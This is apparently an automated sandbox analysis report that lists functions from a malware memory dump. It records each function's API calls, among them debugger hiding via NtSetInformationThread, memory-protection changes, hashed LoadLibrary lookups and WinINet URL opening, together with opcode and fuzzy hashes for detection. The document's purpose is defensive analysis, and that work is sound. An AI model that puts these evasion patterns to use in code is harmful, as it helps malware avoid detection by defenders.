Instruction Fuzzy Hash: 0C313870D44B0596EB04FE3A4C2BB6A3E51BBC4B08F24A626ED275B2C5F5A05855C4C7

Uniqueness

Uniqueness Score: -1.00%

Function 00560743, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Part of subcall function 00564DB7: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565EF2,00560394,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564E96

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 113ee3d3c6bdf01318aa5b201f06526b87f0577f7e811c818cf9b3f09d1aac90
Instruction ID: fdaf90e3b89206de553b2a5c074e9361337357e25d0d0bcb4869f3170d03fa02
Opcode Fuzzy Hash: 113ee3d3c6bdf01318aa5b201f06526b87f0577f7e811c818cf9b3f09d1aac90
Instruction Fuzzy Hash: 04313430C44B4592EB04FE3A4C2B75B3E51BFC4B18F24A762ED665B2C5B6605815C5C7

Uniqueness

Uniqueness Score: -1.00%

Function 00560FA1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113librarynativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0056100D
LoadLibraryA.KERNEL32(?,8802EDAC,?,00565EF2,00560394,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564E96

Strings

W.E, xrefs: 00563FE2

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: W.E
API String ID: 3389902171-3845452836
Opcode ID: c504d007025d6573712de9097cbac4925994ed18bd625ae1cb3a9b934a555cfb
Instruction ID: 302ff3df6e531ae4a7be4a6c2234a23b18f150bd8bc7165a615cf9461e7449c3
Opcode Fuzzy Hash: c504d007025d6573712de9097cbac4925994ed18bd625ae1cb3a9b934a555cfb
Instruction Fuzzy Hash: F731AE719406859BEF21AF158C4EBF53E64FF85354F3D0225FD459B192D2B88C84C20E

Uniqueness

Uniqueness Score: -1.00%

Function 00560F68, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102librarynativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0056100D
LoadLibraryA.KERNEL32(?,8802EDAC,?,00565EF2,00560394,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564E96

Strings

W.E, xrefs: 00563FE2

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: W.E
API String ID: 3389902171-3845452836
Opcode ID: 59942b9cea015458ac4567d047c07a375d39ed3af3af3346575055e8ab9ab3dc
Instruction ID: 159949299248c20c3dd0e6f10b00badc182009a87e1923599cf3e7cc56489547
Opcode Fuzzy Hash: 59942b9cea015458ac4567d047c07a375d39ed3af3af3346575055e8ab9ab3dc
Instruction Fuzzy Hash: 54315771640386ABEF219F108C4DBF53E64FF55358F3D0229F940AB192C7B88880C60D

Uniqueness

Uniqueness Score: -1.00%

Function 005606D3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Strings

1.!T, xrefs: 0056077A

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T
API String ID: 4046476035-3147410236
Opcode ID: 31238347c5a2f745e5180a27ba430a477bd326fa7ce2f171c9fec27a390b5e9c
Instruction ID: ec6332991727863e3d78b8add0b3d0db99bdb129a154a42d9f033721290fc4a2
Opcode Fuzzy Hash: 31238347c5a2f745e5180a27ba430a477bd326fa7ce2f171c9fec27a390b5e9c
Instruction Fuzzy Hash: FC213A70D44B0592EB14FD3A4C2B7AB3E51BBC4B08F245736ED265B2C5F5A05855C4C7

Uniqueness

Uniqueness Score: -1.00%

Function 00566766, Relevance: 1.9, APIs: 1, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03e3b887ce6fc2b42ac4d0c9f7a816db681d35f50488bac77816ca48182345d6
Instruction ID: 8be97468401c1ec1f0307db4fe57c1ea068f848e8b9ac08d3f8dc9c44a36f3b9
Opcode Fuzzy Hash: 03e3b887ce6fc2b42ac4d0c9f7a816db681d35f50488bac77816ca48182345d6
Instruction Fuzzy Hash: D7B14A7190C7808FE71AEA39885AB247FA0FB93314F1946AFC497CB1A3F5244C46C392

Uniqueness

Uniqueness Score: -1.00%

Function 00566D6A, Relevance: 1.8, APIs: 1, Instructions: 326nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 58c2edd9dea22023c259cbe24e5ff15a3dcaf18aa2848fbc1fdd8bd2214616af
Instruction ID: 9478c8413bc0bc35574d2a8101264cebab7029eb3fd83c6302f131e3fbed791c
Opcode Fuzzy Hash: 58c2edd9dea22023c259cbe24e5ff15a3dcaf18aa2848fbc1fdd8bd2214616af
Instruction Fuzzy Hash: 62911635C4CA848BEB0AFE3B5D3F5507FA17E85718F1D8AB6CC2A4B125B6250819C6D3

Uniqueness

Uniqueness Score: -1.00%

Function 00560A8C, Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

+<K, xrefs: 00560ADD

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: +<K
API String ID: 1029625771-4205434992
Opcode ID: 89bc8e6ccdeb8d51a08431096510667b84877eb4f819f930252ba96be9c67e7c
Instruction ID: 32b95b2dbd5463e63f7a6c17c0f74064d88c834a7673d6a0815bd6c5ebef5545
Opcode Fuzzy Hash: 89bc8e6ccdeb8d51a08431096510667b84877eb4f819f930252ba96be9c67e7c
Instruction Fuzzy Hash: 32B17B30C44A0096EB25FA3A4C2B7AA7E62BFC2704F289776DC66872D5F9644C59C1D3

Uniqueness

Uniqueness Score: -1.00%

Function 00566C99, Relevance: 1.6, APIs: 1, Instructions: 134nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 46d432951513bc81144f957a979cf07a5640f1a281b2be879a17b6613d588d50
Instruction ID: 16e306828cc6daae5c9cb15a97749f7f5b2bcdf6ec5bcf3f7fd3850e11218514
Opcode Fuzzy Hash: 46d432951513bc81144f957a979cf07a5640f1a281b2be879a17b6613d588d50
Instruction Fuzzy Hash: CD415B35E08905CEEF28DE79CC2D7647EA1BB84328F584A76CD26871A0E7754C84D6D3

Uniqueness

Uniqueness Score: -1.00%

Function 00566EA3, Relevance: 1.6, APIs: 1, Instructions: 118nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 0e7eeae2226644c998ea84f8bdb8b72b71cae15a21347c02fb49a41e63d02294
Instruction ID: 9491bf3e4889618e1b9bb61042515a1bf7e044b02201dd3381d30ec4547f11ae
Opcode Fuzzy Hash: 0e7eeae2226644c998ea84f8bdb8b72b71cae15a21347c02fb49a41e63d02294
Instruction Fuzzy Hash: 24318435D48E46C62B09FD3B6D2B524FE9178C4B19B2D9B76CD3A8721CB961082DC1C3

Uniqueness

Uniqueness Score: -1.00%

Function 00566C80, Relevance: 1.6, APIs: 1, Instructions: 100nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: ed29f2dcb13679bed2a1b055888848de1586c9bd3555a55b3d5055793918dd6f
Instruction ID: 1695e818195450f9cfd83c990a26975e6211a79b8af5aa4ab300fe85e48c975b
Opcode Fuzzy Hash: ed29f2dcb13679bed2a1b055888848de1586c9bd3555a55b3d5055793918dd6f
Instruction Fuzzy Hash: 85312930608609CEEF348E64CC987B47FA2BB59338F644F6AC556870E4E77548C4DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00566DD9, Relevance: 1.6, APIs: 1, Instructions: 100nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 9903d78de5e3f12eb84ca68fef25006c96eabd9c229dd12287c60fa1e0713048
Instruction ID: 2c7dea67b73de6c776dadf6bd094c7e1ba394dfafcd41fd39bd1907e671978d6
Opcode Fuzzy Hash: 9903d78de5e3f12eb84ca68fef25006c96eabd9c229dd12287c60fa1e0713048
Instruction Fuzzy Hash: D6215C34D08742CFEB49FE7A996A6513F617F81718F284676CC668B054FB220C58C6D3

Uniqueness

Uniqueness Score: -1.00%

Function 00566CE5, Relevance: 1.6, APIs: 1, Instructions: 87nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 29ee12430c59b75badceae5b8eb88d1978ac73b57f44fe445d789083a2f79e2a
Instruction ID: 673f9d91e1bc40b890be2a218cdadcaf9fe02e2e9cf3e0d6477ad9768d992066
Opcode Fuzzy Hash: 29ee12430c59b75badceae5b8eb88d1978ac73b57f44fe445d789083a2f79e2a
Instruction Fuzzy Hash: 4031E730608509CEDF349E64CC58BB87EA1BB59338F694E66C916870E4E73588C4DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00566DAB, Relevance: 1.6, APIs: 1, Instructions: 70nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 177fceb350b0796bd3a4f3b68f4f39cae3766dff2dbef42d23d248cfc08e38d8
Instruction ID: 6e8f9b153b5d11e127abd9312e2e046e4819eb763738a03dac31cd9a5437d583
Opcode Fuzzy Hash: 177fceb350b0796bd3a4f3b68f4f39cae3766dff2dbef42d23d248cfc08e38d8
Instruction Fuzzy Hash: 86112634D08209CEDF259EA4D95CB707EA1BB1532CF294EA6C82287064F7350CC8DAE3

Uniqueness

Uniqueness Score: -1.00%

Function 00566E75, Relevance: 1.5, APIs: 1, Instructions: 49nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 68f8ed994c9340cc929b48da822cb3c41d28feda1d1d60b7503892019427bb0e
Instruction ID: 144e32b4b6cac2c1945e4cdae00fffd7cf98d3c340c7e237d36d46de0c466c28
Opcode Fuzzy Hash: 68f8ed994c9340cc929b48da822cb3c41d28feda1d1d60b7503892019427bb0e
Instruction Fuzzy Hash: E1F07824E08A06CE1B19FD7AAE691746F517885718B6C0B72CD3787158F6220C9CD3C3

Uniqueness

Uniqueness Score: -1.00%

Function 00566EDB, Relevance: 1.5, APIs: 1, Instructions: 47nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00566F28

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 594c692e1a0c44e85e4276c4fb035aae6fe6f405c7e50ef1a49788758b6b3ee1
Instruction ID: b9d86ab22b3df50b6dc6e78752ed2481e4dba0e2f7918a37bfa9d73771f93684
Opcode Fuzzy Hash: 594c692e1a0c44e85e4276c4fb035aae6fe6f405c7e50ef1a49788758b6b3ee1
Instruction Fuzzy Hash: EFF0F634C48A02CA6F2EFD7BADAA524EE917D85718B284BB9CC774711CF521082CD6D2

Uniqueness

Uniqueness Score: -1.00%

Function 00563623, Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,401E2B01,?,00563F4F,00560B93), ref: 00563E61

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f621362aa0a93999138af356031c237697d0718f183b16e5ea240e3dcd4e2aa2
Instruction ID: f4ad92f389511e9957acf03601837c9ae192b11d67594b404e96822c70beb691
Opcode Fuzzy Hash: f621362aa0a93999138af356031c237697d0718f183b16e5ea240e3dcd4e2aa2
Instruction Fuzzy Hash: 4ED0C2314053420E8B117FB8450B14ABF34AE81231726D6468021472F7CA206E2AD7B5

Uniqueness

Uniqueness Score: -1.00%

Function 005668F5, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,00566467,00000040,00560777,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0056690E

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 0056229F, Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000705A,00000000,00000000,00000000), ref: 005623A8

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e2ecba9599d39e536b4489ebaa26e04d15b8dc14b5a667fab19cbbd9f190358e
Instruction ID: cdebe3fcb35d0b6dd057e3d9e050f65dd277508157b5cee9849d6a749f4403dd
Opcode Fuzzy Hash: e2ecba9599d39e536b4489ebaa26e04d15b8dc14b5a667fab19cbbd9f190358e
Instruction Fuzzy Hash: 27313230244701EFE720AF24CC4EFA47BA1BF04710F608555F9855B1E2C7B4DA88CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005622AB, Relevance: 1.3, APIs: 1, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000705A,00000000,00000000,00000000), ref: 005623A8

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ca6604f2b725cc0d2a2c39bcc00c29b479def3a21fb721a023c10cde81b82734
Instruction ID: 6a1002bd9ae1bfc0448d6e53d16639e7b58df578a8b485172a31db0ab2fbc87b
Opcode Fuzzy Hash: ca6604f2b725cc0d2a2c39bcc00c29b479def3a21fb721a023c10cde81b82734
Instruction Fuzzy Hash: D3212234A40B01DEEB24AF248C5EB647EA1BF80B00F648566EE465B2A197748948C997

Uniqueness

Uniqueness Score: -1.00%

Function 00564E1A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565EF2,00560394,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564E96

Strings

_k, xrefs: 00564E5F

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: _k
API String ID: 1029625771-3077844833
Opcode ID: 76bd625c2504e33965a8557f19fd6b15f6fa74c753ec3b8922b2d893ac335f6e
Instruction ID: 88c86a69a375512f0780d5d41b85e1cf76ee1a2c18681a93ec8537c027192378
Opcode Fuzzy Hash: 76bd625c2504e33965a8557f19fd6b15f6fa74c753ec3b8922b2d893ac335f6e
Instruction Fuzzy Hash: 3DF02E21C44E84965B49FF3F1C2B48C3E453AD0B10F15C271ED765721576264C2D8AC3

Uniqueness

Uniqueness Score: -1.00%

Function 00563719, Relevance: 3.1, APIs: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,005633EF,00560827), ref: 0056376D
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563830

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: e353be0f58c275bf343ce339f1282095154ee48bbefbc08ffb90242a96d97898
Instruction ID: 2aaf0e072bb36772de7bc9e1c1188ac0317cb34e3477a1fd5f9152960af75298
Opcode Fuzzy Hash: e353be0f58c275bf343ce339f1282095154ee48bbefbc08ffb90242a96d97898
Instruction Fuzzy Hash: E2310570A40346DAFB349E25CD96BF93E60BF40340F204531FD0A9B190E7705F449A95

Uniqueness

Uniqueness Score: -1.00%

Function 00563716, Relevance: 3.1, APIs: 2, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,005633EF,00560827), ref: 0056376D
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563830

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 0f864957c8533743ea59c5a018458cf3dde8f77ae624bf77ca0292e8102ac04c
Instruction ID: 15c8b1f131b4dc0f5f532142a0aeef54c5e1257fc395a7e370c83384d9cc0226
Opcode Fuzzy Hash: 0f864957c8533743ea59c5a018458cf3dde8f77ae624bf77ca0292e8102ac04c
Instruction Fuzzy Hash: 15316B7024038AEBEF309E54CD85FED3A65BF00340F208825BD4AAB590D7B19A84AB25

Uniqueness

Uniqueness Score: -1.00%

Function 00563750, Relevance: 1.6, APIs: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563830

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 587071ffff62de911b83126c26d8ad01154193fe0b982a3e0a1238d0fb61abdf
Instruction ID: 0d8613a1a23adf3508757ce90bef3904dbb5ce4d68c35fb301d51337016b1f62
Opcode Fuzzy Hash: 587071ffff62de911b83126c26d8ad01154193fe0b982a3e0a1238d0fb61abdf
Instruction Fuzzy Hash: D0310470944386DAEB349E29CC96BE93F60BF44300F14863AEC599B591E3705E48DB96

Uniqueness

Uniqueness Score: -1.00%

Function 00564E6D, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565EF2,00560394,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564E96

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eaa998e1a15be43a83e4caaf32de57fc10b8689e5ac03592614add7fb9e50ce7
Instruction ID: 06b618b86176d23f3d4c5cf6a4a0006cc125f7e4b9b5e4f46caa884773e82661
Opcode Fuzzy Hash: eaa998e1a15be43a83e4caaf32de57fc10b8689e5ac03592614add7fb9e50ce7
Instruction Fuzzy Hash: 5C21C135D04514DFCB08EF29D955899BFA0BF88710B1A8569EC1EAB301E730ED24CEC6

Uniqueness

Uniqueness Score: -1.00%

Function 00560537, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

EnumWindows.USER32(0056067A,?,00000000,?,?,?,?,?,005601D3), ref: 005605A5

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 5d5b70ee673140c880f6672f1c8ae347da2cae2c5771ce655f0cb739d7b290fd
Instruction ID: 8ac9a483232fd7b8242faa1e89ca030315495b5110222534915aeead7e1aa8f7
Opcode Fuzzy Hash: 5d5b70ee673140c880f6672f1c8ae347da2cae2c5771ce655f0cb739d7b290fd
Instruction Fuzzy Hash: DC210830C086809BE74AFA3689276163F60BFC6744F2465A6DC67C72E1F8250819CED3

Uniqueness

Uniqueness Score: -1.00%

Function 005637E9, Relevance: 1.6, APIs: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563830

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 19574b082b6f959205e6daf76b3c35bd8f2a0cc50dff93fc8fc66db87a5e16ec
Instruction ID: d166b9030bd5d6c6ac77acade1a9da9207b84fadffae28ca763f6cff24e14d8c
Opcode Fuzzy Hash: 19574b082b6f959205e6daf76b3c35bd8f2a0cc50dff93fc8fc66db87a5e16ec
Instruction Fuzzy Hash: 1621213094138ACAFB38DE16CCA6BF93F21BF80700F108535EC1A8B140E3705E48DA92

Uniqueness

Uniqueness Score: -1.00%

Function 00564DB3, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565EF2,00560394,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564E96

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 86b8ef9feb3f7bd4fddec4abf42e1e7f5cc30c015f986cb9d0389596aded6608
Instruction ID: 44edf9a9858daaf2cd0615b672f8d8f5c90b13d59cb0e7fe30f05409c21fab3d
Opcode Fuzzy Hash: 86b8ef9feb3f7bd4fddec4abf42e1e7f5cc30c015f986cb9d0389596aded6608
Instruction Fuzzy Hash: A3012B60C8495495EB14BB3B5C0AB6D2E19BBD0B14F14C631BD3793100B6164C2848C3

Uniqueness

Uniqueness Score: -1.00%

Function 0056057D, Relevance: 1.5, APIs: 1, Instructions: 39nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0056067A,?,00000000,?,?,?,?,?,005601D3), ref: 005605A5
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: a368b702938c4cfa2781ec493dc35c51694f47e673d1db108d7e230ea1f7523b
Instruction ID: 804ae62d4337ad9e9ef653df2fb3477eba9a6160fea9102b09fff30a578227d4
Opcode Fuzzy Hash: a368b702938c4cfa2781ec493dc35c51694f47e673d1db108d7e230ea1f7523b
Instruction Fuzzy Hash: 8AF096348086419BD744EA3989763663F907BD5314F246A66DC6BC72D1E920445ACB83

Uniqueness

Uniqueness Score: -1.00%

Function 0056052A, Relevance: 1.5, APIs: 1, Instructions: 36nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0056067A,?,00000000,?,?,?,?,?,005601D3), ref: 005605A5
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00400000,?,00000000), ref: 005607F3

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 502cce530aa22ed1647a61d0d584b0b098b68b547861c9072392b32bf2bd13c2
Instruction ID: a992e9c006fa06362ee60f9360845a2d224b4ab15d8fc5c1ab422b7a41fe593a
Opcode Fuzzy Hash: 502cce530aa22ed1647a61d0d584b0b098b68b547861c9072392b32bf2bd13c2
Instruction Fuzzy Hash: AAF09730108310EEDB418620CDA47BB2EC4BBD6320F38AD19F487830C2CA308649CF12

Uniqueness

Uniqueness Score: -1.00%

Function 00564DB7, Relevance: 1.5, APIs: 1, Instructions: 32libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565EF2,00560394,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564E96

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ba92dd1cfb656db7cfe52e773928a8bad6cff8098cbba4621574b459597d2c3b
Instruction ID: 88c875c6a879b80f0ae61fea507e2d9af3d96da5676f5c911ed7f956edf93475
Opcode Fuzzy Hash: ba92dd1cfb656db7cfe52e773928a8bad6cff8098cbba4621574b459597d2c3b
Instruction Fuzzy Hash: 73E092E048416979DA203B64AC09FBE2E1DFBA1764F208525F2A393042C62A8D444E53

Uniqueness

Uniqueness Score: -1.00%

Function 005633A1, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0056334B,005633EF,00560827), ref: 005633B5

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C

Uniqueness

Uniqueness Score: -1.00%

Function 00565100, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00561FC8,00000000,?,?,00000014,?,?,00000014), ref: 00565103

Memory Dump Source

Source File: 0000001A.00000002.708760652.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c9993196bc088be776cc54674a118fdaf022d4553cc0a768563112edcc0a48b6
Instruction ID: 1e0f47e42302d2d102504011f1774c64d747347936bbd44ebe6cc4874ee1aeed
